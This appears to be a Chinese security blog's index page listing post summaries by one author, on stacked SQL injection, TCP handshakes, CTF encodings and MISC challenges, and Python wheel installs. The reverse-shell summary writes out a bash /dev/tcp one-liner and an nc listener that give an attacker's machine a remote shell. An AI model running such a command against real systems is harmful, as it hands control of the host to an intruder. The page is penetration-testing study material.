摘要: 当 union injection(联合注入) 关键字被过滤了的时候,我们应该想起使用 Stached injection(堆叠注入)。 阅读全文
posted @ 2020-12-29 21:47 ruoli-s 阅读(2647) 评论(0) 推荐(0) 编辑
摘要: 在计算机网络协议中,TCP只是其中一个,然而在网络使用中,TCP也是最离不开的协议之一,它的重要性毋庸置疑,最最重要的是,面试的重点就是它啊,呜呜~~,今天我们一起来看下TCP的连接建立与释放,相信很多小伙伴也想给他一次性整明白。 阅读全文
posted @ 2020-12-29 17:36 ruoli-s 阅读(3263) 评论(0) 推荐(0) 编辑
摘要: 进军攻防世界上的MISC了,遇到有意思的题就简单记录一下,其他的就直接放过了。 阅读全文
posted @ 2020-12-29 14:35 ruoli-s 阅读(818) 评论(0) 推荐(0) 编辑
摘要: 最近打了场ctf,真的是被各种编码以及加密方式给搞怕了,所以,今天就来整理一下ctf中常见的编码,顺便给这次比赛做一个总结。 阅读全文
posted @ 2020-12-29 13:54 ruoli-s 阅读(35817) 评论(6) 推荐(4) 编辑
摘要: python安装whl包时,遇到的一些问题,最后费了好些时间才解决,所以记录一下。 阅读全文
posted @ 2020-12-29 09:45 ruoli-s 阅读(3064) 评论(0) 推荐(1) 编辑
摘要: web渗透之常见shell反弹姿势 常见反弹shell总结: 一、bash反弹 通用 ① 在kali机里面开启端口监听: nc -lvvp port //port 为攻击主机端口号,并且此端口号没有被占用 ② 在目标主机上执行: bash -i >& /dev/tcp/攻击主机ip/port 0>&1 //port 为攻击主机端口号 阅读全文
posted @ 2020-12-29 09:42 ruoli-s 阅读(557) 评论(0) 推荐(0) 编辑